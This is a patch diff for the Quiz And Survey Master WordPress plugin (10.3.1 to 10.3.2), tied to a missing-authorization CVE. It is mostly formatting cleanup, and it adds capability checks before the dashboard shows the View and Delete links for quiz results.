CVE-2025-9294: Quiz And Survey Master <= 10.3.1 – Missing Authorization to Authenticated (Subscriber+) Quiz Results Deletion (quiz-master-next)

--- a/quiz-master-next/blocks/block.php
+++ b/quiz-master-next/blocks/block.php
@@ -35,7 +35,6 @@
 			add_action( 'enqueue_block_editor_assets', array( $this, 'register_block_scripts' ) );

 			add_action( 'rest_api_init', array( $this, 'register_editor_rest_routes' ) );
-
 		}

 		/**
@@ -64,7 +63,6 @@
 					)
 				);
 			}
-
 		}

 		/**
@@ -108,7 +106,7 @@
 		 * Get hierarchical qsm_category
 		 */
 		private function hierarchical_qsm_category( $cat = 0 ) {
-			$category = [];
+			$category = array();
 			$next = get_categories( array(
 				'taxonomy'     => 'qsm_category',
 				'hide_empty'   => false,
@@ -364,7 +362,6 @@
 			);

 			//save pages and question order inside page : qsm_ajax_save_pages()
-
 		}

 		/**
@@ -661,9 +658,7 @@
 				'status' => 'success',
 				'msg'    => __( 'Quiz saved successfully', 'quiz-master-next' ),
 			);
-
 		}
-
 	}

 	QSMBlock::get_instance();
--- a/quiz-master-next/mlw_quizmaster2.php
+++ b/quiz-master-next/mlw_quizmaster2.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name: Quiz And Survey Master
  * Description: Easily and quickly add quizzes and surveys to your website.
- * Version: 10.3.1
+ * Version: 10.3.2
  * Author: ExpressTech
  * Author URI: https://quizandsurveymaster.com/
  * Plugin URI: https://expresstech.io/
@@ -43,7 +43,7 @@
 	 * @var string
 	 * @since 4.0.0
 	 */
-	public $version = '10.3.1';
+	public $version = '10.3.2';

 	/**
 	 * QSM Alert Manager Object
@@ -619,7 +619,6 @@
 		);
 		$qsm_admin_messages = apply_filters( 'qsm_admin_messages_after', $qsm_admin_messages );
 		wp_localize_script( 'qsm_admin_js', 'qsm_admin_messages', $qsm_admin_messages );
-
 	}

 	/**
@@ -798,7 +797,7 @@
 			return;
 		}
 		$roles    = (array) $user->roles;
-		if ( empty( $roles ) ) {
+		if ( empty( $roles ) || !isset($roles[0]) || !is_string($roles[0]) ) {
 			return;
 		}
 		$rolename = $roles[0];
@@ -806,12 +805,11 @@
 		if ( ! $role ) {
 			return;
 		}
-
 		// Dynamically determine the capabilities to add based on the current user role.
 		$capabilities_to_add = isset(${$rolename . '_capabilities'}) ? ${$rolename . '_capabilities'} : array();
 		$capabilities_to_add = apply_filters(
 			'qsm_default_user_capabilities',
-			isset(${$rolename . '_capabilities'}) ? array_unique( array_merge( $capabilities_to_add, $contributor_capabilities ) ) : [],
+			isset(${$rolename . '_capabilities'}) ? array_unique( array_merge( $capabilities_to_add, $contributor_capabilities ) ) : array(),
 			$user
 		);

@@ -947,8 +945,8 @@
         $question_terms_table_name       = $wpdb->prefix . 'mlw_question_terms';

         // List of tables and their columns
-        $tables = [
-            $quiz_table_name                 => [
+        $tables = array(
+            $quiz_table_name                 => array(
                 'quiz_id',
 				'quiz_name',
 				'message_before',
@@ -1005,8 +1003,8 @@
 				'quiz_taken',
 				'deleted',
 				'quiz_author_id',
-            ],
-            $question_table_name             => [
+            ),
+            $question_table_name             => array(
                 'question_id',
 				'quiz_id',
 				'question_name',
@@ -1034,8 +1032,8 @@
 				'category',
 				'deleted',
                 'deleted_question_bank',
-            ],
-            $results_table_name              => [
+            ),
+            $results_table_name              => array(
                 'result_id',
 				'quiz_id',
 				'quiz_name',
@@ -1058,8 +1056,8 @@
 				'form_type',
 				'page_name',
 				'page_url',
-            ],
-            $audit_table_name                => [
+            ),
+            $audit_table_name                => array(
                 'trail_id',
 				'action_user',
 				'action',
@@ -1067,32 +1065,32 @@
 				'quiz_name',
 				'form_data',
 				'time',
-            ],
-            $themes_table_name               => [
+            ),
+            $themes_table_name               => array(
                 'id',
 				'theme',
 				'theme_name',
 				'default_settings',
 				'theme_active',
-            ],
-            $quiz_themes_settings_table_name => [
+            ),
+            $quiz_themes_settings_table_name => array(
                 'id',
 				'theme_id',
 				'quiz_id',
 				'quiz_theme_settings',
 				'active_theme',
-            ],
-            $question_terms_table_name       => [
+            ),
+            $question_terms_table_name       => array(
                 'id',
 				'question_id',
 				'quiz_id',
 				'term_id',
 				'taxonomy',
-            ],
-        ];
+            ),
+        );
 		$response['message'] = "";
         // Check all tables
-        $errors = [];
+        $errors = array();
         foreach ( $tables as $table_name => $columns ) {
             $error = $this->qsm_check_table_structure($table_name, $columns);
             if ( $error ) {
@@ -1133,7 +1131,7 @@
             return esc_html__("Table ", "quiz-master-next") . $table_name . esc_html__(" does not exist.", "quiz-master-next");
         }
         $existing_columns = array_column($columns, 'Field');
-        $missing_columns = [];
+        $missing_columns = array();
         foreach ( $expected_columns as $column ) {
             if ( ! in_array($column, $existing_columns, true) ) {
                 $missing_columns[] = $column;
@@ -1243,7 +1241,7 @@
 					<?php esc_html_e( 'We need to upgrade your database so that you can enjoy the latest features.', 'quiz-master-next' ); ?><br>
 					<?php
 					/* translators: %s: HTML tag */
-					echo sprintf( esc_html__( 'Please note that this action %1$s can not be %2$s rolled back. We recommend you to take a backup of your current site before proceeding.', 'quiz-master-next' ), '<b>', '</b>' );
+					printf( esc_html__( 'Please note that this action %1$s can not be %2$s rolled back. We recommend you to take a backup of your current site before proceeding.', 'quiz-master-next' ), '<b>', '</b>' );
 					?>
 				</p>
 				<p class="category-action">
--- a/quiz-master-next/php/admin/about-page.php
+++ b/quiz-master-next/php/admin/about-page.php
@@ -21,20 +21,20 @@
 	if ( ! current_user_can( 'delete_others_qsm_quizzes' ) ) {
 		return;
 	}
-	$tab_array = [
-		[
+	$tab_array = array(
+		array(
 			'slug'  => 'about',
 			'title' => 'About',
-		],
-		[
+		),
+		array(
 			'slug'  => 'help',
 			'title' => 'Help',
-		],
-		[
+		),
+		array(
 			'slug'  => 'system_info',
 			'title' => 'System Info',
-		],
-	];
+		),
+	);
 	$active_tab = isset($_GET['tab']) ? sanitize_text_field( wp_unslash( $_GET['tab'] ) ) : 'about';

 	// Creates the widgets.
--- a/quiz-master-next/php/admin/addons-page.php
+++ b/quiz-master-next/php/admin/addons-page.php
@@ -180,7 +180,7 @@
 								</a>
 							</div>
 						</div>
-					<?php $count++;
+					<?php ++$count;
 					} ?>
 				</div>
 			<?php } ?>
--- a/quiz-master-next/php/admin/admin-dashboard.php
+++ b/quiz-master-next/php/admin/admin-dashboard.php
@@ -13,12 +13,12 @@
  * @since 7.3.5
  * @return array $blog_data
  */
-function qsm_get_blog_data_rss(){
-	include_once( ABSPATH . WPINC . '/feed.php' );
+function qsm_get_blog_data_rss() {
+	include_once ABSPATH . WPINC . '/feed.php';
 	$blog_data_obj = fetch_feed( 'https://quizandsurveymaster.com/feed/' );
-	$maxitems = 0;
+	$maxitems      = 0;
 	if ( ! is_wp_error( $blog_data_obj ) ) {
-		$maxitems = $blog_data_obj->get_item_quantity( 2 );
+		$maxitems        = $blog_data_obj->get_item_quantity( 2 );
 		$blog_data_items = $blog_data_obj->get_items( 0, $maxitems );
 	}
 	$blog_data = array();
@@ -55,31 +55,31 @@
 function qsm_check_plugins_compatibility() {
 	global $mlwQuizMasterNext;

-    if ( class_exists('QSM_Installer') ) {
+	if ( class_exists( 'QSM_Installer' ) ) {
 		$plugin_path = WP_PLUGIN_DIR . '/qsm-installer/qsm-installer.php';
-        $plugin_data = get_plugin_data( $plugin_path );
+		$plugin_data = get_plugin_data( $plugin_path );

-        // Check if the plugin version is below 2.0.0
-        if ( isset( $plugin_data['Version'] ) && version_compare( $plugin_data['Version'], '2.0.0', '<' ) ) {
+		// Check if the plugin version is below 2.0.0
+		if ( isset( $plugin_data['Version'] ) && version_compare( $plugin_data['Version'], '2.0.0', '<' ) ) {
 			$account_url = esc_url( qsm_get_utm_link( 'https://quizandsurveymaster.com/account', 'dashboard', 'useful_links', 'qsm_installer_update' ) );
 			?>
 			<div class="qsm-dashboard-help-center qsm-dashboard-warning-container">
 				<div class="qsm-dashboard-error-content">
-					<h3><?php esc_html_e('Update Available', 'quiz-master-next'); ?></h3>
-					<p><?php esc_html_e('We recommend downloading the latest version of the QSM Installer for a seamless quiz and survey creation experience.', 'quiz-master-next'); ?></p>
-					<a href="<?php echo esc_url($account_url); ?>" class="qsm-dashboard-error-btn" target="_blank">
-						<?php esc_html_e('Get Latest QSM Installer', 'quiz-master-next'); ?>
+					<h3><?php esc_html_e( 'Update Available', 'quiz-master-next' ); ?></h3>
+					<p><?php esc_html_e( 'We recommend downloading the latest version of the QSM Installer for a seamless quiz and survey creation experience.', 'quiz-master-next' ); ?></p>
+					<a href="<?php echo esc_url( $account_url ); ?>" class="qsm-dashboard-error-btn" target="_blank">
+						<?php esc_html_e( 'Get Latest QSM Installer', 'quiz-master-next' ); ?>
 					</a>
 				</div>
 			</div>
-		<?php
+			<?php
 		}
 	}
 }

-function qsm_dashboard_display_change_log_section(){
+function qsm_dashboard_display_change_log_section() {
 	global $wp_filesystem, $mlwQuizMasterNext;
-	require_once ( ABSPATH . '/wp-admin/includes/file.php' );
+	require_once ABSPATH . '/wp-admin/includes/file.php';
 	WP_Filesystem();
 	$change_log  = array();
 	$readme_file = QSM_PLUGIN_PATH . 'readme.txt';
@@ -88,9 +88,9 @@
 		if ( $file_content ) {
 			$parts = explode( '== Changelog ==', $file_content, 2 );
 			if ( isset( $parts[1] ) ) {
-				preg_match_all('/* (.+)/', $parts[1], $matches);
-				if ( ! empty($matches[1]) ) {
-					$change_log = array_slice($matches[1], 0, 5);
+				preg_match_all( '/* (.+)/', $parts[1], $matches );
+				if ( ! empty( $matches[1] ) ) {
+					$change_log = array_slice( $matches[1], 0, 5 );
 				}
 			}
 		}
@@ -122,7 +122,7 @@
 									<p><?php echo wp_kses_post( $cl_str ); ?></p>
 								</li>
 								<?php
-								$i ++;
+								++$i;
 							}
 						}
 						?>
@@ -137,56 +137,56 @@
 	<?php
 }

-function qsm_dashboard_display_need_help_section(){
+function qsm_dashboard_display_need_help_section() {
 		// Define sections
-	$sections = [
-		[
-			'title'       => __('Documentation', 'quiz-master-next'),
-			'description' => __('Find detailed guides and step-by-step instructions to help you explore and utilize all the features of the QSM plugin effectively.', 'quiz-master-next'),
+	$sections = array(
+		array(
+			'title'       => __( 'Documentation', 'quiz-master-next' ),
+			'description' => __( 'Find detailed guides and step-by-step instructions to help you explore and utilize all the features of the QSM plugin effectively.', 'quiz-master-next' ),
 			'image'       => QSM_PLUGIN_URL . 'assets/contact.png',
 			'alt'         => 'contact.png',
-			'link'        => qsm_get_plugin_link('docs', 'dashboard', 'next_steps', 'dashboard_read_document'),
-		],
-		[
-			'title'       => __('Demos', 'quiz-master-next'),
-			'description' => __('Explore live examples of quizzes and surveys built with QSM to see its features in action.', 'quiz-master-next'),
+			'link'        => qsm_get_plugin_link( 'docs', 'dashboard', 'next_steps', 'dashboard_read_document' ),
+		),
+		array(
+			'title'       => __( 'Demos', 'quiz-master-next' ),
+			'description' => __( 'Explore live examples of quizzes and surveys built with QSM to see its features in action.', 'quiz-master-next' ),
 			'image'       => QSM_PLUGIN_URL . 'assets/camera.png',
 			'alt'         => 'camera.png',
-			'link'        => qsm_get_utm_link('https://demo.quizandsurveymaster.com/', 'demos', 'dashboard', 'useful_links', 'dashboard_demos'),
+			'link'        => qsm_get_utm_link( 'https://demo.quizandsurveymaster.com/', 'demos', 'dashboard', 'useful_links', 'dashboard_demos' ),

-		],
-		[
-			'title'       => __('FAQ', 'quiz-master-next'),
-			'description' => __('Get quick answers to commonly asked questions about QSM, covering troubleshooting, setup, and best practices.', 'quiz-master-next'),
+		),
+		array(
+			'title'       => __( 'FAQ', 'quiz-master-next' ),
+			'description' => __( 'Get quick answers to commonly asked questions about QSM, covering troubleshooting, setup, and best practices.', 'quiz-master-next' ),
 			'image'       => QSM_PLUGIN_URL . 'assets/faq.png',
 			'alt'         => 'faq.png',
 			'link'        => 'https://quizandsurveymaster.com/#:~:text=Frequently%20asked%20questions',
-		],
-		[
-			'title'       => __('Contact Support', 'quiz-master-next'),
-			'description' => __('Need further assistance? Reach out to our support team for personalized help with any issues or queries related to QSM.', 'quiz-master-next'),
+		),
+		array(
+			'title'       => __( 'Contact Support', 'quiz-master-next' ),
+			'description' => __( 'Need further assistance? Reach out to our support team for personalized help with any issues or queries related to QSM.', 'quiz-master-next' ),
 			'image'       => QSM_PLUGIN_URL . 'assets/dashboard-support.png',
 			'alt'         => 'dashboard-support.png',
-			'link'        => qsm_get_plugin_link('contact-support', 'dashboard', 'useful_links', 'dashboard_support'),
-		],
-	];
+			'link'        => qsm_get_plugin_link( 'contact-support', 'dashboard', 'useful_links', 'dashboard_support' ),
+		),
+	);
 	?>

 	<div class="qsm-dashboard-help-center">
-	<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__('Need Help?', 'quiz-master-next'); ?></h3>
+	<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__( 'Need Help?', 'quiz-master-next' ); ?></h3>
 		<div class="qsm-dashboard-help-center-grid qsm-dashboard-page-common-style">
 			<?php foreach ( $sections as $section ) : ?>
 				<div class="qsm-dashboard-help-center-card">
 					<div class="qsm-dashboard-help-center-card-icon">
 						<div class="qsm-dashboard-help-icon-wrap">
-						<img class="qsm-dashboard-help-image" src="<?php echo esc_url($section['image']); ?>" alt="<?php echo esc_attr($section['alt']); ?>"/>
+						<img class="qsm-dashboard-help-image" src="<?php echo esc_url( $section['image'] ); ?>" alt="<?php echo esc_attr( $section['alt'] ); ?>"/>
 						</div>
 					</div>
 					<h3 class="qsm-dashboard-help-center-card-title">
-					<a target="_blank" rel="noopener" href="<?php echo esc_url( $section['link'] )?>" class="welcome-icon"><?php echo esc_html($section['title']); ?></a>
+					<a target="_blank" rel="noopener" href="<?php echo esc_url( $section['link'] ); ?>" class="welcome-icon"><?php echo esc_html( $section['title'] ); ?></a>
 					</h3>
 					<p class="qsm-dashboard-help-center-card-description">
-						<?php echo esc_html($section['description']); ?>
+						<?php echo esc_html( $section['description'] ); ?>
 					</p>
 				</div>
 			<?php endforeach; ?>
@@ -196,8 +196,8 @@
 }

 function qsm_dashboard_display_popular_addon_section( $popular_addons ) {
-	$desiredOrder = [ 572582, 591230, 567900, 3437 ];
-	$sortedAddons = [];
+	$desiredOrder = array( 572582, 591230, 567900, 3437 );
+	$sortedAddons = array();
 	foreach ( $desiredOrder as $id ) {
 		foreach ( $popular_addons as $addon ) {
 			if ( $addon['id'] == $id ) {
@@ -207,11 +207,12 @@
 	}
 	?>
 	<div class="qsm-dashboard-help-center">
-		<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__('Explore Addons', 'quiz-master-next'); ?></h3>
+		<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__( 'Explore Addons', 'quiz-master-next' ); ?></h3>
 		<div class="qsm-dashboard-help-center-grid qsm-dashboard-page-common-style">
-			<?php foreach ( array_slice($sortedAddons, 0, 4) as $addon ) :
+			<?php
+			foreach ( array_slice( $sortedAddons, 0, 4 ) as $addon ) :
 				$addon_link = qsm_get_utm_link( $addon['link'], 'addon_setting', 'popular_addon', 'addon-settings_' . sanitize_title( $addon['name'] ) );
-				$addon_icon = isset($addon['icon']) && "" != $addon['icon'] ? $addon['icon'] : QSM_PLUGIN_URL . 'assets/chat-smile.png';
+				$addon_icon = isset( $addon['icon'] ) && '' != $addon['icon'] ? $addon['icon'] : QSM_PLUGIN_URL . 'assets/chat-smile.png';
 				?>
 				<div class="qsm-dashboard-help-center-card">
 					<div class="qsm-dashboard-help-center-card-icon">
@@ -220,12 +221,13 @@
 						</div>
 					</div>
 					<h3 class="qsm-dashboard-help-center-card-title">
-					<a target="_blank" rel="noopener" href="<?php echo esc_url($addon_link); ?>"><?php echo esc_html($addon['name']); ?></a>
+					<a target="_blank" rel="noopener" href="<?php echo esc_url( $addon_link ); ?>"><?php echo esc_html( $addon['name'] ); ?></a>
 					</h3>
 					<p class="qsm-dashboard-help-center-card-description">
-						<?php  $display_text = mb_strlen($addon['description']) > 110 ? mb_substr($addon['description'], 0, 110) . '...' : $addon['description'];
-						echo esc_html($display_text);
-					?>
+						<?php
+						$display_text = mb_strlen( $addon['description'] ) > 110 ? mb_substr( $addon['description'], 0, 110 ) . '...' : $addon['description'];
+						echo esc_html( $display_text );
+						?>
 					</p>
 				</div>
 			<?php endforeach; ?>
@@ -236,8 +238,8 @@


 function qsm_dashboard_display_popular_theme_section( $themes ) {
-	$desiredOrder = [ 547794, 557086, 551027, 302299 ];
-	$sortedThemes = [];
+	$desiredOrder = array( 547794, 557086, 551027, 302299 );
+	$sortedThemes = array();
 	foreach ( $desiredOrder as $id ) {
 		foreach ( $themes as $theme ) {
 			if ( $theme['id'] == $id ) {
@@ -247,24 +249,25 @@
 	}
 	?>
 	<div class="qsm-dashboard-help-center">
-		<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__('Popular Themes', 'quiz-master-next'); ?></h3>
+		<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__( 'Popular Themes', 'quiz-master-next' ); ?></h3>
 		<div class="qsm-dashboard-themes-container qsm-dashboard-page-common-style">
-			<?php foreach ( $sortedThemes as $single_theme ) {
-				$theme_demo          = qsm_get_utm_link( $single_theme['demo'], 'new_quiz', 'themes', 'quizsurvey_preview_' . sanitize_title( $single_theme['name'] ) );
+			<?php
+			foreach ( $sortedThemes as $single_theme ) {
+				$theme_demo = qsm_get_utm_link( $single_theme['demo'], 'new_quiz', 'themes', 'quizsurvey_preview_' . sanitize_title( $single_theme['name'] ) );
 				?>
 				<div class="qsm-dashboard-themes-card">
 					<div class="qsm-dashboard-themes-image-wrapper">
-						<img src="<?php echo esc_url($single_theme['img']); ?>" alt="<?php echo esc_attr($single_theme['name']); ?>">
+						<img src="<?php echo esc_url( $single_theme['img'] ); ?>" alt="<?php echo esc_attr( $single_theme['name'] ); ?>">
 					</div>
 					<div class="qsm-dashboard-themes-details-wrapper">
-						<h3><?php echo esc_html($single_theme['name']); ?></h3>
-						<a class="button button-secondary" target="_blank" href="<?php echo esc_url($theme_demo); ?>" class="qsm-dashboard-themes-button"><?php echo esc_html__('Demo', 'quiz-master-next'); ?></a>
+						<h3><?php echo esc_html( $single_theme['name'] ); ?></h3>
+						<a class="button button-secondary" target="_blank" href="<?php echo esc_url( $theme_demo ); ?>" class="qsm-dashboard-themes-button"><?php echo esc_html__( 'Demo', 'quiz-master-next' ); ?></a>
 					</div>
 				</div>
 			<?php } ?>
 		</div>
 	</div>
-<?php
+	<?php
 }

 /**
@@ -276,34 +279,38 @@
 function qsm_dashboard_recent_taken_quiz() {
 	global $wpdb;
 	$mlw_result_data = $wpdb->get_row( "SELECT DISTINCT COUNT(result_id) as total_result FROM {$wpdb->prefix}mlw_results WHERE deleted=0", ARRAY_A );
-	if($mlw_result_data['total_result'] != 0){
-	?>
+	if ( 0 != $mlw_result_data['total_result'] ) {
+		?>
 	<div class="qsm-dashboard-help-center">
 		<h3 class="qsm-dashboard-help-center-title"><?php esc_html_e( 'Recent Activity', 'quiz-master-next' ); ?></h3>
 		<div class="qsm-dashboard-recently-taken-quiz qsm-dashboard-page-common-style">
 			<a href="admin.php?page=mlw_quiz_results" style="color: #fff;" class="button button-primary qsm-dashboard-view-all-results">
-				<?php echo esc_html__( 'See All Results ', 'quiz-master-next' );
-				echo isset( $mlw_result_data['total_result'] ) ? ' (' . wp_kses_post( $mlw_result_data['total_result'] ) . ')' : ''; ?>
+				<?php
+				echo esc_html__( 'See All Results ', 'quiz-master-next' );
+				echo isset( $mlw_result_data['total_result'] ) ? ' (' . wp_kses_post( $mlw_result_data['total_result'] ) . ')' : '';
+				?>
 			</a>
 			<ul class="recently-taken-quiz-ul">
 				<?php
 				$mlw_result_data = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}mlw_results WHERE deleted=0 ORDER BY result_id DESC LIMIT 2", ARRAY_A );
 				if ( $mlw_result_data ) {
-					foreach ( $mlw_result_data as $key => $single_result_arr ) { ?>
-						<li> <?php
-							if ( isset( $single_result_arr['user'] ) && '' !== $single_result_arr['user'] ) {
-								echo '<img src="' . esc_url( get_avatar_url( $single_result_arr['user'] ) ) . '" class="avatar avatar-50 photo" alt="User Avatar">';
-							} else {
-								echo '<img src="' . esc_url( QSM_PLUGIN_URL . '/assets/default_image.png' ) . '" class="avatar avatar-50 photo" alt="Default Image">';
-							}
-							?>
+					foreach ( $mlw_result_data as $key => $single_result_arr ) {
+						?>
+						<li>
+						<?php
+						if ( isset( $single_result_arr['user'] ) && '' !== $single_result_arr['user'] ) {
+							echo '<img src="' . esc_url( get_avatar_url( $single_result_arr['user'] ) ) . '" class="avatar avatar-50 photo" alt="User Avatar">';
+						} else {
+							echo '<img src="' . esc_url( QSM_PLUGIN_URL . '/assets/default_image.png' ) . '" class="avatar avatar-50 photo" alt="Default Image">';
+						}
+						?>
 							<div class="rtq-main-wrapper">
 								<span class="rtq_user_info">
 									<?php
 									if ( isset( $single_result_arr['user'] ) && 0 !== intval( $single_result_arr['user'] ) ) {
-										$edit_link = get_edit_profile_url( $single_result_arr['user'] );
+										$edit_link   = get_edit_profile_url( $single_result_arr['user'] );
 										$actual_user = get_userdata( $single_result_arr['user'] );
-										$user_name = 'None' === $single_result_arr['name'] ? $actual_user->data->display_name : $single_result_arr['name'];
+										$user_name   = 'None' === $single_result_arr['name'] ? $actual_user->data->display_name : $single_result_arr['name'];
 										echo '<a href="' . esc_url( $edit_link ) . '">' . esc_html( $user_name ) . '</a>';
 									} else {
 										esc_html_e( 'Guest', 'quiz-master-next' );
@@ -315,7 +322,7 @@
 								<span class="rtq-result-info">
 									<?php
 									$quotes_list = '';
-									$form_type = isset( $single_result_arr['form_type'] ) ? $single_result_arr['form_type'] : 0;
+									$form_type   = isset( $single_result_arr['form_type'] ) ? $single_result_arr['form_type'] : 0;
 									if ( 1 === intval( $form_type ) || 2 === intval( $form_type ) ) {
 										$quotes_list .= __( 'Not Graded', 'quiz-master-next' );
 									} else {
@@ -353,23 +360,29 @@
 									?>
 								</span>
 								<span class="rtq-time-taken"><?php echo esc_html( date_i18n( get_option( 'date_format' ), strtotime( $single_result_arr['time_taken'] ) ) ); ?></span>
-								<p class="row-actions-c">
-									<a
-										href="admin.php?page=qsm_quiz_result_details&result_id=<?php echo esc_attr( $single_result_arr['result_id'] ); ?>">View</a>
-									| <a href="javascript:void(0)" data-result_id="<?php echo esc_attr( $single_result_arr['result_id'] ); ?>"
-										class="trash rtq-delete-result"><?php esc_html_e( 'Delete', 'quiz-master-next' ); ?></a>
-								</p>
+								<?php if ( current_user_can( 'view_qsm_quiz_result' ) || current_user_can( 'administrator' ) ) { ?>
+									<p class="row-actions-c">
+										<a href="admin.php?page=qsm_quiz_result_details&result_id=<?php echo esc_attr( $single_result_arr['result_id'] ); ?>"><?php esc_html_e( 'View', 'quiz-master-next' ); ?></a>
+										<?php if ( current_user_can( 'administrator' ) ) { ?>
+											| <a href="javascript:void(0)" data-result_id="<?php echo esc_attr( $single_result_arr['result_id'] ); ?>"
+												class="trash rtq-delete-result"><?php esc_html_e( 'Delete', 'quiz-master-next' ); ?></a>
+										<?php } ?>
+									</p>
+								<?php } ?>
 							</div>
-						</li>
-					<?php }
-				} else { ?>
+						<?php
+					}
+				} else {
+					?>
 					<li><?php esc_html_e( 'No recent activity found.', 'quiz-master-next' ); ?></li>
-				<?php }
+					<?php
+				}
 				?>
 			</ul>
 		</div>
 	</div>
-	<?php }
+		<?php
+	}
 }

 /**
@@ -383,7 +396,7 @@
 	}
 	global $mlwQuizMasterNext;
 	qsm_display_header_section_links();
-?>
+	?>
 <div class="wrap">
 	<div class="qsm-dashboard-wrapper">
 		<div class="qsm-dashboard-container">
@@ -393,19 +406,19 @@
 					<p class="qsm-dashboard-card-description"><?php esc_html_e( 'Design quizzes and surveys tailored to your needs.', 'quiz-master-next' ); ?></p>
 				</div>
 				<div class="">
-					<a class="button button-primary qsm-dashboard-section-create-quiz"  href="<?php echo esc_url(admin_url('admin.php?page=qsm_create_quiz_page')); ?>" ><?php esc_html_e( 'Get Started', 'quiz-master-next' ) ?><img class="qsm-dashboard-help-image" src="<?php echo esc_url(QSM_PLUGIN_URL . 'assets/right-arrow.png'); ?>" alt="right-arrow.png"/></a>
+					<a class="button button-primary qsm-dashboard-section-create-quiz"  href="<?php echo esc_url( admin_url( 'admin.php?page=qsm_create_quiz_page' ) ); ?>" ><?php esc_html_e( 'Get Started', 'quiz-master-next' ); ?><img class="qsm-dashboard-help-image" src="<?php echo esc_url( QSM_PLUGIN_URL . 'assets/right-arrow.png' ); ?>" alt="right-arrow.png"/></a>
 				</div>
 			</div>

 			<?php
 			$qsm_admin_dd = qsm_get_parsing_script_data();
 			if ( $qsm_admin_dd ) {
-				$popular_addons = isset($qsm_admin_dd['popular_products']) ? $qsm_admin_dd['popular_products'] : [];
-				$themes = isset($qsm_admin_dd['themes']) ? $qsm_admin_dd['themes'] : [];
+				$popular_addons = isset( $qsm_admin_dd['popular_products'] ) ? $qsm_admin_dd['popular_products'] : array();
+				$themes         = isset( $qsm_admin_dd['themes'] ) ? $qsm_admin_dd['themes'] : array();
 				qsm_check_plugins_compatibility();
 				qsm_dashboard_recent_taken_quiz();
-				qsm_dashboard_display_popular_theme_section($themes);
-				qsm_dashboard_display_popular_addon_section($popular_addons);
+				qsm_dashboard_display_popular_theme_section( $themes );
+				qsm_dashboard_display_popular_addon_section( $popular_addons );
 				qsm_dashboard_display_change_log_section();
 				qsm_dashboard_display_need_help_section();
 			} else {
@@ -416,7 +429,7 @@
 	</div>
 	<?php qsm_display_promotion_links_section(); ?>
 </div>
-<?php
+	<?php
 }
 /**
  * @since 7.0
@@ -454,33 +467,33 @@
 			<ul class="what-new-ul">
 				<li>
 					<a href="https://app.productstash.io/qsm#/roadmap"
-						target="_blank" rel="noopener"> <?php esc_html_e( "Roadmap", "quiz-master-next"); ?>
+						target="_blank" rel="noopener"> <?php esc_html_e( 'Roadmap', 'quiz-master-next' ); ?>
 					</a>
 					<div class="post-description">
-						<?php esc_html_e( "Visit out public Roadmap to checkout what's in the development pipepline of QSM.", "quiz-master-next"); ?>
+						<?php esc_html_e( "Visit out public Roadmap to checkout what's in the development pipepline of QSM.", 'quiz-master-next' ); ?>
 					</div>
 				</li>
 				<li>
 					<a href="https://app.productstash.io/qsm#/updates"
-						target="_blank" rel="noopener"><?php esc_html_e( "Recent Updates", "quiz-master-next"); ?>
+						target="_blank" rel="noopener"><?php esc_html_e( 'Recent Updates', 'quiz-master-next' ); ?>
 					</a>
 					<div class="post-description">
-						<?php esc_html_e( "Checkout our updates page to know more about our recent releases", "quiz-master-next"); ?>
+						<?php esc_html_e( 'Checkout our updates page to know more about our recent releases', 'quiz-master-next' ); ?>
 					</div>
 				</li>
 				<li>
 					<a href="https://app.productstash.io/qsm#/ideas"
-						target="_blank" rel="noopener"><?php esc_html_e( "Submit your ideas", "quiz-master-next"); ?>
+						target="_blank" rel="noopener"><?php esc_html_e( 'Submit your ideas', 'quiz-master-next' ); ?>
 					</a>
 					<div class="post-description">
-						<?php esc_html_e( "We are open your suggestions on how to improve QSM. Please visit our ideas page to share your thoughts.", "quiz-master-next"); ?>
+						<?php esc_html_e( 'We are open your suggestions on how to improve QSM. Please visit our ideas page to share your thoughts.', 'quiz-master-next' ); ?>
 					</div>
 				</li>
 			</ul>
 		</div>
 	</div>
 </div>
-<?php
+	<?php
 }

 /**
@@ -489,11 +502,11 @@
  */
 function qsm_create_new_quiz_from_wizard() {
 	// Create new quiz.
-	if ( isset( $_POST['qsm_new_quiz_nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash($_POST['qsm_new_quiz_nonce'] ) ), 'qsm_new_quiz' ) ) {
+	if ( isset( $_POST['qsm_new_quiz_nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['qsm_new_quiz_nonce'] ) ), 'qsm_new_quiz' ) ) {
 		global $mlwQuizMasterNext;
 		$quiz_name = isset( $_POST['quiz_name'] ) ? sanitize_text_field( wp_unslash( $_POST['quiz_name'] ) ) : '';
 		$quiz_name = htmlspecialchars( $quiz_name, ENT_QUOTES );
-		$theme_id    = isset( $_POST['quiz_theme_id'] ) ? intval( $_POST['quiz_theme_id'] ) : 0;
+		$theme_id  = isset( $_POST['quiz_theme_id'] ) ? intval( $_POST['quiz_theme_id'] ) : 0;
 		unset( $_POST['qsm_new_quiz_nonce'] );
 		unset( $_POST['_wp_http_referer'] );
 		unset( $_POST['quiz_theme_id'] );
@@ -521,26 +534,30 @@
 		/**
 		 * Prepare Contact Fields
 		 */
-		$contact_form    = array();
+		$contact_form = array();
 		if ( isset( $_POST['enable_contact_form'] ) && 1 == sanitize_text_field( wp_unslash( $_POST['enable_contact_form'] ) ) ) {
-			$cf_fields       = QSM_Contact_Manager::default_fields();
+			$cf_fields = QSM_Contact_Manager::default_fields();
 			if ( isset( $cf_fields['name'] ) ) {
 				$cf_fields['name']['enable'] = 'true';
 				$contact_form[]              = $cf_fields['name'];
 			}
 			if ( isset( $cf_fields['email'] ) ) {
-				$cf_fields['email']['enable']    = 'true';
-				$contact_form[]                  = $cf_fields['email'];
+				$cf_fields['email']['enable'] = 'true';
+				$contact_form[]               = $cf_fields['email'];
 			}
 		}
 		/**
 		 * Prepare Quiz Options
 		 */
 		$quiz_options = apply_filters( 'qsm_quiz_wizard_settings_option_save', $quiz_options );
-		$mlwQuizMasterNext->quizCreator->create_quiz( $quiz_name, $theme_id, array(
-			'quiz_options' => $quiz_options,
-			'contact_form' => $contact_form,
-		) );
+		$mlwQuizMasterNext->quizCreator->create_quiz(
+			$quiz_name,
+			$theme_id,
+			array(
+				'quiz_options' => $quiz_options,
+				'contact_form' => $contact_form,
+			)
+		);
 	}
 }

--- a/quiz-master-next/php/admin/admin-results-page.php
